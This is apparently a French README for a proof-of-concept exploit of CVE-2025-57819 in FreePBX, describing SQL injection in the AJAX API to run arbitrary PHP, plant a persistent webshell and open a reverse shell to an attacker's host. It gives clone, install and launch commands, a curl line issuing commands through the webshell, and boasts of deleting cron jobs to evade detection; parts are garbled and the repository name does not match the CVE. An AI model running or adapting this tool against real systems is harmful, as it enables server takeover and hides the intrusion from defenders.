
Exploit de preuve de concept pour CVE-2025-57819 dans FreePBX : injection SQL dans l'API AJAX pour exécuter du PHP arbitraire, créer un webshell persistant et déclencher un reverse shell.
Ce script exploite une vulnérabilité dans les versions de FreePBX antérieures à 16.0.26.0 (CVE-2025-57819), permettant à des attaquants distants d'exécuter du code PHP arbitraire via une faille d'injection SQL dans l'endpoint de l'API AJAX. L'exploit crée à la fois un webshell et un reverse shell à déclenchement automatique.
/admin/ajax.php)/pbxshell.phprequestsgit clone https://github.com/jasonbernier/CVE-2025-5781.git
cd CVE-2025-5781
pip install requests
python3 exploit.py -H TARGET_HOST -lhost LHOST -lport LPORT
-H HOST : Instance FreePBX cible (p. ex., https://freepbx.example.com)-lhost LHOST : Votre IP pour le rappel du reverse shell-lport LPORT : Port pour la connexion du reverse shellpython3 exploit.py -H https://target.freepbx.com -lhost 10.0.0.1 -lport 4444
Après une exploitation réussie, accédez au webshell via :
curl -X GET "http://TARGET/pbxshell.php?cmd=id"
L'exploit supprime automatiquement les tâches cron après l'exécution pour éviter toute détection.
-- pour commenter la syntaxe SQL restante/var/www/html/